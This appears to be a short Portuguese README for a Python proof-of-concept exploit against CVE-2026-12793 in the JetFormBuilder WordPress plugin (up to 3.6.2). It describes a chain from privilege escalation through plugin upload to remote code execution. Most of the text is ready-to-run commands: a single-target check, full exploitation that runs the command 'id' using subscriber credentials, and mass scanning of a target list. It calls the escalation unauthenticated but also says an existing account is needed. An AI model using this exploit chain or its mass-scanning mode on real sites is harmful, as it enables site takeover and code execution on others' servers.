
PoC em Python para CVE-2026-12793 no JetFormBuilder <= 3.6.2: escalonamento de privilégios não autenticado que leva ao upload de plugin e execução remota de código, com modos de verificação e varredura em massa.
Escalação de privilégios não autenticada → upload de plugin → RCE.
<= 3.6.2>= 3.6.3# Verificar alvo único
python poc.py -u https://target.example --mode check
# Exploração completa (requer uma conta existente de baixo privilégio)
python poc.py -u https://target.example --mode exploit \
-nu subscriber -np 'Password123' -c id
# Varredura em massa
python poc.py -l targets.txt --mode check -t 30